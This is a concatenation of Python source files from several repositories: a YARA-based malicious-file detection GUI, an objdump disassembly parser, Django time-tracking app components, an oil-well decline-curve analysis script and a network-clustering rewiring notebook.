from badfiles.badfiles import Badfile, isolate_or_clear
@Gooey(
program_name="Badfiles",
program_description="A malicious file detection engine written with Python and Yara.",
default_size=(1200, 1200),
)
def main():
parser = GooeyParser(description="Badfiles")
target_group = parser.add_argument_group(
"Target", "Select either a file or directory to analyze."
)
target_group.add_argument(
"--file", widget="FileChooser", default=None, help="A file to analyze", required=False
)
target_group.add_argument(
"--dir", widget="DirChooser", default=None, help="A directory to analyze", required=False
)
disposition_group = parser.add_argument_group(
"Disposition", "Select directories to move badfiles and safe files."
)
disposition_group.add_argument(
"--iso_dir",
widget="DirChooser",
help="The directory to isolate badfiles.",
default=None,
required=False,
)
disposition_group.add_argument(
"--safe_dir",
widget="DirChooser",
help="The directory to store cleared files",
default=None,
required=False,
)
rule_group = parser.add_argument_group("Yara Rules", "Select custom Yara rules as desired.")
rule_group.add_argument(
"--zip_rules",
widget="FileChooser",
help="Path to zipfile rules.",
default=None,
required=False,
)
rule_group.add_argument(
"--tar_rules",
widget="FileChooser",
help="Path to tarfile rules",
default=None,
required=False,
)
rule_group.add_argument(
"--csv_rules",
widget="FileChooser",
help="Path to tarfile rules",
default=None,
required=False,
)
args = parser.parse_args()
bad = Badfile(
zip_rules=args.zip_rules,
tar_rules=args.tar_rules,
csv_rules=args.csv_rules,
# gzip_rules=args.gzip_rules,
# image_rules=args.image_rules
)
if args.file and args.dir:
raise ValueError("Analyzing both a single file and a directory is not supported.")
if not args.file and not args.dir:
raise ValueError("Naming either a single file or directory is required.")
if args.file:
f = bad.is_badfile(args.file)
print(f)
isolate_or_clear(args.file, f, iso_dir=args.iso_dir, safe_dir=args.safe_dir)
if args.dir:
for d in pathlib.Path(args.dir).glob("**/*"):
print(f"inspecting {d}")
if d.is_file():
f = bad.is_badfile(d)
print(f)
isolate_or_clear(d, f, iso_dir=args.iso_dir, safe_dir=args.safe_dir)
else:
print(f"{d} is a directory skipping.")
pass
if __name__ == "__main__":
main() # pragma: no cover
```
#### File: badfiles/badfiles/process_tar.py
```python
from functools import partial
from os import PathLike
from typing import Generator
def process_tar(f: PathLike, chunk: int = 512) -> Generator[bytes, None, None]:
"""A generator function that yields tar file headers.
Args:
f (PathLike): The path the the tar file.
chunk (int, optional): The size of the tarfile chunks. Defaults to 512.
Yields:
Generator[bytes, None, None]: Tar file header(s).
"""
with open(f, "rb") as f:
for fh in iter(partial(f.read, chunk), b""):
try:
data = fh
# size = data.decode("ascii")[124:135]
# print(size)
if data.decode("ascii")[257:262] == "ustar" and data[125:135].isascii():
yield data
except (UnicodeDecodeError, ValueError):
pass
if __name__ == "__main__":
print([p for p in process_tar("./test/tar_dir.tar")])
```
|
{
"source": "Jeffallan/Obfuspy",
"score": 3
}
|
#### File: Jeffallan/Obfuspy/obfustat.py
```python
import argparse
from os import name
from typing import IO
import helpers
from pathlib import Path
from db import Base, create_db, Program, Function, Block, Instruction
from sqlalchemy.orm import sessionmaker
from pathlib import Path
def main() -> None:
# Data Collections
FUNC = helpers.FUNCTION_COLLECTION
PROG = helpers.PROGRAM_COLLECTION
BLOCK = helpers.BLOCK_COLLECTION
INST = helpers.INSTRUCTION_COLLECTION
# CLI Arguments
prs = argparse.ArgumentParser()
prs.add_argument(
"file", help="Parses the output of objdump -dwj .text {file}")
prs.add_argument(
"--llvm_blocks", help="The number of LLVM blocks", default=0)
prs.add_argument("--llvm_instructions",
help="The number of LLVM instructions", default=0)
prs.add_argument("--average_instructions",
help="The average number of LLVM instructions per block", default=0)
args = prs.parse_args()
# End CLI Arguments
engine = create_db(f"{args.file.split('/')[-1]}")
SESSION = sessionmaker(bind=engine)
session = SESSION()
size = helpers.get_size(args.file)
disassemble = helpers.disassemble_binary(args.file)
hexdump = helpers.make_raw_hex(args.file)
prog = PROG(name=Path(args.file).name,
llvm_blocks=args.llvm_blocks,
llvm_instructions=args.llvm_instructions,
average_instructions=args.average_instructions,
entropy=helpers.calculate_entropy(hexdump),
raw_hex=hexdump,
size=size)
program = (Program(name=prog.name,
llvm_blocks=prog.llvm_blocks,
llvm_instructions=prog.llvm_instructions,
average_instructions=prog.average_instructions,
entropy=prog.entropy,
raw_hex=prog.raw_hex,
size=prog.size))
session.add(program)
session.commit()
# Lists for storing information about the functions, blocks, and instructions
FUNCTIONS = []
INSTRUCTIONS = []
BLOCKS = []
helpers._check_newline(disassemble)
with open(disassemble) as inf:
header = False
func_name = ""
func_instructions = 0
jump_instructions = 0
block_count = 0
block_instructions = 0
block_name = ""
for i in inf:
function = helpers._is_func(i)
if function:
header = True
func_instructions = 0
func_name = (function.group(0).translate(
str.maketrans({"<": "", ">": "", ":": ""})))
func_1 = (Function(name=func_name,
program_id=program.id,
instruction_count=0,
jump_count=0,
blocks=0,
average_block_size=0))
session.add(func_1)
session.commit()
if block_count == 0:
block_name = f"{func_name}_block_{block_count}"
blk_1 = (Block(name=block_name,
function_id=func_1.id,
instruction_count=0))
session.add(blk_1)
session.commit()
elif header:
block_name = f"{func_name}_block_{block_count}"
# Checks to see if we are still inside the function
if i[0] == " ":
# accumulate instructions for function level count
if helpers._is_jump(i):
jump_instructions += 1
block_instructions += 1
block = BLOCK(name=block_name,
function=func_name,
instruction_count=block_instructions)
BLOCKS.append(block)
b = session.query(Block).get(blk_1.id)
b.instruction_count=block.instruction_count
session.commit()
blk_1 = (Block(name=block.name,
function_id=func_1.id,
instruction_count=block.instruction_count))
session.add(blk_1)
session.commit()
block_count = block_count+1
block_instructions = 0
else:
block_instructions += 1
func_instructions += 1
# accumulate instructions
# Parse line with \t delimiter
split = i.split("\t")
if len(split) > 2:
el = split[2].split()
# print(el)
if len(el) > 1:
op = " ".join(el).replace("\n", "")
else:
op = None
inst = INST(block=block_name,
name=el[0],
offset=split[0].strip().replace(":", ""),
bytes=split[1].strip(),
op=op)
INSTRUCTIONS.append(inst)
i = (Instruction(name=inst.name,
block_id=blk_1.id,
offset=inst.offset,
byte_str=inst.bytes,
op=inst.op))
session.add(i)
session.commit()
# To catch a null byte
else:
inst = INST(block=block_name,
name="NULL BYTE",
offset=split[0].strip().replace(":", ""),
bytes=split[1].strip(),
op=None)
INSTRUCTIONS.append(inst)
i = (Instruction(name=inst.name,
block_id=blk_1.id,
offset=inst.offset,
byte_str=inst.bytes,
op=inst.op))
session.add(i)
session.commit()
# Checks for newline that separates functions in objdump
elif len(i) <= 1:
block = BLOCK(name=block_name,
function=func_name,
instruction_count=block_instructions)
if block.instruction_count > 0:
BLOCKS.append(block)
blk_2 = session.query(Block).get(blk_1.id)
blk_2.instruction_count = block.instruction_count
session.commit()
# Add function to function collection
f = FUNC(name=func_name,
program=prog.name,
instruction_count=func_instructions,
jump_count=jump_instructions,
blocks=block_count)
FUNCTIONS.append(f)
func_2 = session.query(Function).get(func_1.id)
func_2.instruction_count = f.instruction_count
func_2.jump_count = f.jump_count
func_2.blocks = f.blocks
func_2.average_block_size = f.instruction_count / f.blocks
session.commit()
# Reset global variables
header = False
func_instructions = 0
jump_instructions = 0
block_count = 1
block_instructions = 0
print(
f"Analysis of {prog.name}\n\tSize Bytes:\t{prog.size}\n\tEntropy:\t{prog.entropy}")
print(f"\nFunctions:\n")
for f in FUNCTIONS:
print(
f"Name: {f.name}\n\tInstructions: {f.instruction_count}\n\tJumps: {f.jump_count}\n\tBlocks: {f.blocks}")
for i in INSTRUCTIONS:
print(
f"\n\t\tName: {i.name}\n\t\tBlock: {i.block}\n\t\tOffset: {i.offset}\n\t\tBytes: {i.bytes}\n\t\tOperation: {i.op}")
for b in BLOCKS:
print(
f"Block:\n\t\tName: {b.name}\n\t\tMember: {b.function}\n\t\tInstructions: {b.instruction_count}")
# print(prog.name)
# program = (Program(name=prog.name,
# llvm_blocks=prog.llvm_blocks,
# llvm_instructions=prog.llvm_instructions,
# average_instructions=prog.average_instructions,
# entropy=prog.entropy,
# raw_hex=prog.raw_hex,
# size=prog.size))
# session.add(program)
# session.commit()
#for f in FUNCTIONS:
# f = (Function(name=f.name,
# program_id=program.id,
# instruction_count=f.instruction_count,
# jump_count=f.jump_count,
# blocks=f.blocks,
# average_block_size=f.instruction_count / f.blocks))
# session.add(f)
# session.commit()
#for b in BLOCKS:
#if b.function == f.name:
# b = (Block(name=b.name,
# function_id=f.id,
# instruction_count=b.instruction_count))
# session.add(b)
# session.commit()
# for i in INSTRUCTIONS:
#if i.block == b.name:
# i = (Instruction(name=i.name,
# block_id=b.id,
# offset=i.offset,
# byte_str=i.bytes,
# op=i.op))
# session.add(i)
# session.commit()
if __name__ == "__main__":
main()
```
|
{
"source": "Jeffallan/timekeeper",
"score": 2
}
|
#### File: management/commands/gen_clients.py
```python
from django.core.management.base import BaseCommand
from django.db import models, transaction
from typing import Any, Optional
from api.apps.clients.factory import Client, Location
import api.apps.clients.models as models
CLIENT = 5
LOCATION = 5
class Command(BaseCommand):
help = "Generates test data for clients and locations."
models = [Client, Location]
@transaction.atomic
def handle(self, *args: Any, **options: Any) -> Optional[str]:
self.stdout.write("Creating test data.")
self.stdout.write("Creating clients.")
models.Client.objects.all().delete()
for _ in range(CLIENT):
client = Client()
#self.stdout.write("Creating locations.")
#for _ in range(LOCATION):
# loc = Location()
```
#### File: apps/core/permissions.py
```python
from rest_framework import permissions
class IsUserOrReadOnly(permissions.BasePermission):
"""
Object-level permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
if request.user.is_staff:
return True
return obj == request.user
class IsAdmin(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 1
class IsStaff(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 2
class IsUser(permissions.BasePermission):
def has_permission(self, request, view):
return request.user.role == 3
```
#### File: apps/core/validators.py
```python
from django.core.exceptions import ValidationError
from django.utils.translation import gettext_lazy as _
from decimal import Decimal
def validate_duration(value):
if value <= Decimal(0.25):
raise ValidationError(
_('%(value)s Minimum billabe time is 15 min.'),
params={'value': value},
)
if value >= Decimal(24.0):
raise ValidationError(
_('%(value)s Submission exceeds maximum.'),
params={'value': value},
)
```
#### File: apps/services/factory.py
```python
from api.apps.services.models import Service
from api.apps.users.models import User
import factory
from factory.django import DjangoModelFactory
from datetime import datetime
import random
from api.apps.users.factory import active_choice
from api.apps.core.util.services import ServiceChoices
class ServiceFactory(DjangoModelFactory):
class Meta:
model = Service
name = factory.Faker("job")
service_unit = random.choice([x.name for x in ServiceChoices])
is_duration = factory.LazyFunction(active_choice)
@factory.post_generation
def approved_providers(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for provider in extracted:
self.providers.add(provider)
```
#### File: apps/work/factory.py
```python
from factory.base import Factory
from api.apps.work.models import WorkPerformed
import factory
from factory.django import DjangoModelFactory
import random
from api.apps.users.models import User
from api.apps.services.models import Service
from api.apps.clients.models import Location
class WorkFactory(DjangoModelFactory):
class Meta:
model = WorkPerformed
service_date = factory.Faker("date_this_decade")
start_time = factory.Faker("time")
stop_time = factory.Faker("time")
billed = factory.Faker("boolean")
location = factory.Iterator(Location.objects.all())
provider = factory.Iterator(User.objects.all())
service = factory.Iterator(Service.objects.all())
units = random.uniform(1.00, 24.00)
"""
@factory.post_generation
def location(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.location.add(e)
@factory.post_generation
def provider(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.provider.add(e)
@factory.post_generation
def service(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for e in extracted:
self.service.add(e)
"""
```
#### File: apps/work/views.py
```python
from rest_framework import viewsets
from .models import WorkPerformed
from .serializers import WorkPerformedSerializer
from api.apps.users.models import User
from dry_rest_permissions.generics import DRYPermissions
class WorkPerformedViewSet(viewsets.ModelViewSet):
queryset = WorkPerformed.objects.all()
serializer_class = WorkPerformedSerializer
permission_classes = [DRYPermissions,]
def get_queryset(self):
if self.request.user.role == 1:
return WorkPerformed.objects.all()
return WorkPerformed.objects.filter(provider=self.request.user.id)
```
|
{
"source": "Jeffalltogether/well_decline_curve_analysis",
"score": 3
}
|
#### File: Jeffalltogether/well_decline_curve_analysis/wellAnalysis.py
```python
import sys
sys.path.append('./utils/')
import os, math
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from geopy.distance import vincenty
# import tools and custom code
from tools import load_merge_header_and_production_csv, swap_production_dates_for_time_delta
from tools import current_selection, decline_curve, handle_numerical_variables, handle_dateTime_variables
from tools import handle_object_variables, plot_map, fit_decline_curve, add_BOE_per_day_column, nominal_decline
def main(headerCSV, productionCSV):
analysis = Quick_TypeCurve_Analysis(headerCSV, productionCSV)
print '\n********************************************************************************'
print '* *'
print '* Well Type Curve Analysis *'
print '* *'
print '* Quit this program anytime by pressing `ctrl+C` *\n'
print 'reading well header data from: %s' %headerCSV
print 'reading production data from: %s' %productionCSV
# select by well number
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByName = raw_input ('would you like to select individual wells by API-UWI number? [y/n]: ')
# check user input
while wellByName not in ('y', 'n', 'Y', 'N'):
wellByName = raw_input('please try again [y/n]? ')
if wellByName == 'y' or wellByName == 'Y':
analysis.subset_by_well_name()
# select nearby wells with a circular radius
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByName = raw_input ('would you like to select wells near a GPS location? [y/n]: ')
# check user input
while wellByName not in ('y', 'n', 'Y', 'N'):
wellByName = raw_input('please try again [y/n]? ')
if wellByName == 'y' or wellByName == 'Y':
analysis.subset_wells_by_distance()
# select by variable ranges
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
wellByVariable = raw_input ('would you like to subset wells by column values? [y/n]: ')
# check user input
while wellByVariable not in ('y', 'n', 'Y', 'N'):
wellByVariable = raw_input('please try again [y/n]? ')
if wellByVariable == 'y' or wellByVariable == 'Y':
analysis.subset_well_by_variable()
# plot type curve for all selected wells
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
b_value = None
# determine if user wants to pre-specify any of the decline curve aprameters
fixed_b = raw_input ('would you like to pre-specify the decline curve b-factor? [y/n]: ')
# check user input
while fixed_b not in ('y', 'n', 'Y', 'N'):
fixed_b = raw_input('please try again [y/n]? ')
if fixed_b.upper() == 'Y':
while True:
try:
b_value = float(raw_input('Enter value for b-factor: '))
except ValueError:
print 'Please enter a number'
continue
else:
break
analysis.generate_type_curve(b_value)
# plot map
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.map_selected_wells()
# save csv
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.save_selected_data()
# plot wells individually
print '\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n'
analysis.plot_individual_wells_and_type_curves()
return
class Quick_TypeCurve_Analysis(object):
'''
Type curve analysis based on Jessica's work.
Decline curve estimates from a python module available at:
http://www.uky.edu/KGS/emsweb/devsh/production/decline_obj.py
'''
def __init__(self, headerCSV, productionCSV):
self.wellDF = load_merge_header_and_production_csv(headerCSV, productionCSV)
self.wellDF = add_BOE_per_day_column(self.wellDF)
self.userLocation = []
def subset_wells_by_distance(self):
# obtain longitude and latitudes from user
while len(self.userLocation) != 2:
while True:
try:
self.userLocation = raw_input('\nDefine the center of your radius in Latitude (WGS84), and Longitude (WGS84) (separate by comma): ')
self.userLocation = [x.strip() for x in self.userLocation.split(',')]
self.userLocation = [float(x) for x in self.userLocation]
except ValueError:
print 'Please enter numbers'
continue
else:
break
# obtain the selection radius from user
while True:
try:
userRadius = float(raw_input('\nDefine the radius within which you will keep all nearby wells (in miles): '))
except ValueError:
print 'Please enter numbers'
continue
else:
break
# add vicintiy column to data set
dist = np.zeros(len(self.wellDF['API/UWI']))
for i,(lat,lon) in enumerate(zip(self.wellDF['Surface Latitude (WGS84)'], self.wellDF['Surface Longitude (WGS84)'])):
dist[i] = vincenty([lat, lon], self.userLocation).miles
self.wellDF['vicinity'] = dist
# keep only wells withing the user selected radius
self.wellDF = self.wellDF.loc[self.wellDF['vicinity'] <= userRadius]
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def subset_by_well_name(self):
allWells = list(set(self.wellDF['API/UWI']))
print '\nSelect one or more of the followig wells by API/UWI number\n'
print 'all wells available...'
for i,well in enumerate(allWells):
print '%i -- %s' %(i, well)
selection = raw_input('well selection [separate by commas]:\n')
selectionList = [x.strip() for x in selection.split(',')]
self.wellDF = self.wellDF[self.wellDF['API/UWI'].isin(selectionList)]
current_selection(self.wellDF)
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def subset_well_by_variable(self):
allVariables = self.wellDF.columns.values
print '\nSelect one or more of the followig variables\n'
print 'all variables available...'
# generate dictionary of variables
variableDict = dict()
for i,var in enumerate(allVariables):
print '%i -- %s' %(i, var)
variableDict.update({i:var})
selectedVars = []
while len(selectedVars) == 0:
try:
selection = raw_input('Select the variables by their number [separate multiple selections by commas]:\n')
selectionList = [x.strip() for x in selection.split(',')]
selectedVars = [variableDict.get(int(key)) for key in selectionList]
except ValueError:
print 'Please enter variables by their number'
continue
else:
break
print 'you selected the following variables: '
print selectedVars
for colName in selectedVars:
print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
print '\nthe variable \"%s\" is of type \"%s\"' %(colName, self.wellDF[colName].dtypes)
if str(self.wellDF[colName].dtypes) in ['float64', 'int64']:
self.wellDF = handle_numerical_variables(self.wellDF, colName)
elif str(self.wellDF[colName].dtypes) in ['object']:
self.wellDF = handle_object_variables(self.wellDF, colName)
elif str(self.wellDF[colName].dtypes) in ['datetime64', 'timedelta[ns]','datetime64[ns]']:
self.wellDF = handle_dateTime_variables(self.wellDF, colName)
else:
print 'data type not recognized, skipping variable'
continue
# notify user of changes to current selection
print '%i wells selected' %(len(set(self.wellDF['API/UWI'])))
return
def generate_type_curve(self, b_value = None):
# get time dela column from seleccted wells
self.wellDF = swap_production_dates_for_time_delta(self.wellDF)
# decline curve estiamged parameters
qi, b, di, r2 = fit_decline_curve(self.wellDF, fixed_b_factor = b_value)
d_nominal = nominal_decline(qi, b, di)
# times to estimate for the plot in int(days)
time_0 = 0
time_n = np.timedelta64(self.wellDF['Time Delta'].max())
decline_t = np.arange(time_0, time_n, np.timedelta64(10,'D'))
decline_t = (decline_t / np.timedelta64(1, 'D')).astype(int)
# estimated decline curve
decline_y = decline_curve(decline_t, qi, b, di)
# plot well data
fig, ax = plt.subplots(figsize = (15,8))
for API in set(self.wellDF['API/UWI']):
plotData = self.wellDF.loc[self.wellDF['API/UWI'] == API, ['Time Delta', 'BOE per day']]
days = plotData['Time Delta'].dt.days
liquid = np.array(plotData['BOE per day'])
ax.semilogy(days, liquid, '-', label = API)
# add decline estimate
ax.plot(decline_t, decline_y, '-', color='black', linewidth=5.0, label = 'Estimated Decline')
# set axis limits
xmin = (self.wellDF['Time Delta'].min() / np.timedelta64(1, 'D')).astype(int)
xmin = xmin*0.15
xmax = (self.wellDF['Time Delta'].max() / np.timedelta64(1, 'D')).astype(int)
xmax = xmax*1.06
ax.set_xlim([xmin, xmax])
# add titles and legend
ax.set_xlabel('Time [Days]')
ax.set_ylabel('BOE per Day\n[Barrels of Oil Equivalent per Day]')
ax.set_title('Decline Curve Parameters: qi=%.2f, b=%.4f, nominal decline rate=%.1f, r2=%.3f' %(qi, b, d_nominal, r2))
num_col = math.ceil(len(set(self.wellDF['API/UWI']))/40.0) # number of columns to put in legend
num_col = int(num_col)
ax.legend(bbox_to_anchor=(1.26, 0.9), ncol = num_col, fontsize = 9-num_col, labelspacing=0.2)
# Customize the major grid
ax.grid(which='major', linestyle='-', linewidth='0.5', color='grey')
# Customize the minor grid
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='grey')
# eliminate unnecessary white space
plt.subplots_adjust(left=0.07, right=0.8, top=0.9, bottom=0.1)
# save and display plot
plt.savefig('./results/Average_decline_estimate.png')
plt.close()
return
def map_selected_wells(self):
print 'generating map, this may take a minute...'
# send data to mapping function
if not(self.userLocation):
plot_map(self.wellDF)
else:
plot_map(self.wellDF, self.userLocation)
return
def save_selected_data(self):
print 'saving selected wells to .csv'
self.wellDF.to_csv('./results/selected_wells.csv')
return
def plot_individual_wells_and_type_curves(self):
print 'generating plots for all selected wells'
# get time dela column from seleccted wells
self.wellDF = swap_production_dates_for_time_delta(self.wellDF)
declineFit = []
for well in np.unique(self.wellDF['API/UWI']):
print 'fitting well # %s' %(str(well))
wellData = self.wellDF[self.wellDF['API/UWI'] == well]
# decline curve estiamged parameters
qi, b, di, r2 = fit_decline_curve(wellData)
# compute Nominal decline
d_nominal = nominal_decline(qi, b, di)
# add data to list for saving to excel
declineFit.append([wellData, qi, b, d_nominal, di, r2])
# times to estimate for the plot in int(days)
time_0 = 0
time_n = np.timedelta64(wellData['Time Delta'].max())
decline_t = np.arange(time_0, time_n, np.timedelta64(10,'D'))
decline_t = (decline_t / np.timedelta64(1, 'D')).astype(int)
# estimated decline curve
decline_y = decline_curve(decline_t, qi, b, di)
# plot well data
fig, ax = plt.subplots(figsize = (15,8))
days = wellData['Time Delta'].dt.days
liquid = np.array(wellData['BOE per day'])
ax.semilogy(days, liquid, 'o-', label = well)
# add decline estimate
ax.plot(decline_t, decline_y, '-', color='black', linewidth=5.0, label = 'Estimated Decline')
# set axis limits
xmin = (wellData['Time Delta'].min() / np.timedelta64(1, 'D')).astype(int)
xmin = xmin*0.15
xmax = (wellData['Time Delta'].max() / np.timedelta64(1, 'D')).astype(int)
xmax = xmax*1.06
ax.set_xlim([xmin, xmax])
# add titles and legend
ax.set_xlabel('Time [Days]')
ax.set_ylabel('BOE per Day\n[Barrels of Oil Equivalent per Day]')
ax.set_title('Decline Curve Parameters: qi=%.2f, b=%.4f, nominal decline rate=%.1f, r2=%.3f' %(qi, b, d_nominal, r2))
ax.legend(bbox_to_anchor=(1.28, 1.05))
# Customize the major grid
ax.grid(which='major', linestyle='-', linewidth='0.5', color='grey')
# Customize the minor grid
ax.grid(which='minor', linestyle=':', linewidth='0.5', color='grey')
# eliminate unnecessary white space
plt.subplots_adjust(left=0.07, right=0.8, top=0.9, bottom=0.1)
# save and display plot
plt.savefig('./results/' + str(well) + '_decline_estimate.png')
plt.close()
declineFitDF = pd.DataFrame(declineFit, columns = ['API/UWI', 'qi', 'b', 'nominal decline rate', 'effective decline rate[di]', 'r2'])
declineFitDF.to_csv('./results/individual_well_decline_curves.csv')
return
if __name__ == '__main__':
### well data files
headerCSV = './data/Well_header_data.csv'
productionCSV = './data/Production_Time_Series.CSV'
main(headerCSV, productionCSV)
```
|
{
"source": "jeffalstott/network_clustering_growth",
"score": 3
}
|
#### File: network_clustering_growth/MRC_Notebook/Clean_Implementation.py
```python
%matplotlib inline
# <codecell>
from pylab import *
# <markdowncell>
# Define the algorithm
# ====
# <codecell>
import networkx as nx
# def one_move(g,A2):
# doorway = find_doorway(g,A2)
# hinge, target, latch = find_door(g,A2,doorway)
# swing_door(g, hinge, target, latch)
# return g, hinge, target, latch
def one_move(g,A2):
most_wedges_order = argsort(A2.ravel())[::-1]
doorways = array(unravel_index(most_wedges_order, shape(A2)))
for doorway_index in range(doorways.shape[1]):
doorway = tuple(doorways[:,doorway_index])
if g.has_edge(*doorway): #There's already an edge there
continue
if doorway[0]==doorway[1]: #The proposed target is a self link
continue
door = find_door(g, doorway, A2)
if door:
hinge, target, latch = door
g = swing_door(g, hinge, target, latch)
return g, hinge, target, latch
return None
def find_door(g, doorway, A2):
wedges_across_doorway = A2[doorway]
neighbors_wedges = A2[array(doorway)]
neighbors_least_wedges_order = argsort(neighbors_wedges.ravel())
candidate_doors = array(unravel_index(neighbors_least_wedges_order, shape(neighbors_wedges)))
for candidate_door_index in range(candidate_doors.shape[1]):
side_of_door_with_hinge, target_neighbor = candidate_doors[:,candidate_door_index]
hinge = doorway[side_of_door_with_hinge]
latch = doorway[not side_of_door_with_hinge]
wedges_across_candidate_door_position = A2[hinge, target_neighbor]
#We want to complete more wedges than we open. So if the wedges across the doorway is less
#than those across the current door (all of which are currently triangles), then we don't
#want to make this move.
if wedges_across_doorway<=wedges_across_candidate_door_position:
return None
#Because the wedges_across_candidate_door_position is sorted from low to high, if
#we meet this condition once, then we know the rest of the candidate door positions will
#be even worse, so we should stop
if (g.has_edge(hinge,target_neighbor) and
g.degree(target_neighbor) > g.degree(latch) and
not g.edge[hinge][target_neighbor]['fixed']):
return hinge, target_neighbor, latch
return None
def swing_door(g, hinge, target_neighbor, latch):
g.remove_edge(hinge, target_neighbor)
g.add_edge(hinge, latch, fixed=True)
return g
def nt_np(G):
triangles=0 # 6 times number of triangles
contri=0 # 2 times number of connected triples
for v,d,t in nx.algorithms.cluster._triangles_and_degree_iter(G):
contri += d*(d-1)
triangles += t
if triangles==0: # we had no triangles or possible triangles
return 0.0, float(contri)
else:
return triangles/6.0, float(contri)/2.0
# <markdowncell>
# Create the initial graph
# ===
# <codecell>
n_nodes = 100
p = 1.5*log(n_nodes)/n_nodes
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
original_graph = g.copy()
try_count = 1
max_tries = 1000
while not nx.is_connected(g):
g = nx.erdos_renyi_graph(n=n_nodes, p=p)
try_count += 1
if try_count>max_tries:
print("Can't make a connected graph. Tried %i times."%max_tries)
break
print("Average degree: %.2f"%mean(list(g.degree().values())))
# <markdowncell>
# Get initial measurements of the original graph
# ====
# <codecell>
nt, np = nt_np(g)
A = nx.adjacency_matrix(g).todense()
A2 = A**2
change_percentage = 1
n_trials = floor(change_percentage*g.number_of_edges())
Cs = [nt/np]
C_locals = [nx.average_clustering(g)]
mean_k = [mean(list(g.degree().values()))]
pl = [nx.average_shortest_path_length(g)]
initial_degrees = g.degree().values()
# <markdowncell>
# Rewire the graph
# ===
# <codecell>
for i,j in g.edges_iter():
g[i][j]['fixed'] = False
print("Attempting %i edge rewires, out of %i edges"%(n_trials, g.number_of_edges()))
for k in arange(n_trials):
#print k
if not k%10:
print("Rewiring %i out of %i"%(k,n_trials))
# A2 = array(A2)
# fill_diagonal(A2, 0)
outputs = one_move(g, array(A2))
if not outputs:
print("Couldn't make a move!")
break
else:
g, hinge, x, y = outputs
w = A2[hinge, y]
t = A2[hinge, x]
#nt = nt + w - t
#np = np + g.degree(y) - g.degree(x) + 1
nt, np = nt_np(g)
A = nx.adjacency_matrix(g).todense()
A2 = A**2
### This is a purported speedup that causes the algorithm to break for some reason
# Anew = nx.adjacency_matrix(g).todense()
# N = Anew-A
# A2 = A2 + Anew*N + N*Anew + N**2
# A = Anew
### Or maybe something like this?
# N = zeros(shape(A))
# N[hinge,x] = N[x, hinge] = 1
# N[hinge,y] = N[y, hinge] = -1
# A2 = A2 + AN + NA + N**2
mean_k.append(mean(list(g.degree().values())))
Cs.append(nt/np)
pl.append(nx.average_shortest_path_length(g))
C_locals.append(nx.average_clustering(g))
print("Rewired %.1f percent of edges"%(100*float(k)/n_trials))
end_degrees = g.degree().values()
rewired_graph = g.copy()
# <markdowncell>
# Measure the graph's properties during rewiring
# ====
# <codecell>
Cs = array(Cs)
C_locals = array(C_locals)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Total (Triange Density)")
plot(arange(k+1)/k, C_locals/C_locals[0], color='r', label="Avg. Local")
ylabel("Clustering Increase From Initial")
title("Clustering Goes Up, With Two Definitions")
xlabel("Percent of Rewirings")
lg = legend(loc=4)
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Clustering_Increases.pdf")
# <codecell>
Cs = array(Cs)
pl = array(pl)
plot(arange(k+1)/k,Cs/Cs[0], color='b', label="Clustering")
ylabel("Total Clustering", color='b')
xlabel("Percent of Rewirings")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
twinx()
plot(arange(k+1)/k, pl/pl[0], color='r', label="Average Path Length")
ylabel("Average Path Length", color='r')
title("Path Length Also Increases, Though More Slowly")
ax = gca()
ax.spines['top'].set_visible(False)
ax.get_xaxis().tick_bottom()
savefig("Model-Clustering_vs_Path_Length.pdf")
# <codecell>
Gamma = Cs/Cs[0]
Lambda = pl/pl[0]
swi = Gamma/Lambda
f = figure()
ax = f.add_subplot(1,1,1)
x = arange(k+1)/k
plot(x,swi)
text(.7, .5, "Clustering / Path Length,\nCompared to Initial", transform=ax.transAxes, horizontalalignment='center')
ylabel("Small World Index")
xlabel("Percent of Rewirings")
title("Small World Index Grows with Rewiring, then Plateaus")
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Small_World_Index.pdf")
# <codecell>
hist(list(initial_degrees), label='Initial', normed=True)
hist(list(end_degrees), alpha=.8, label='After Rewiring', normed=True)
legend()
title("Degree Distribution Changes With Rewiring")
ylabel("p(Degree)")
xlabel("Degree")
lg = legend()
lg.draw_frame(False)
ax = gca()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
savefig("Model-Degree_Distribution.pdf")
# <markdowncell>
# Visualize the graph before and afterward
# ===
# <codecell>
figure()
nx.draw(original_graph)
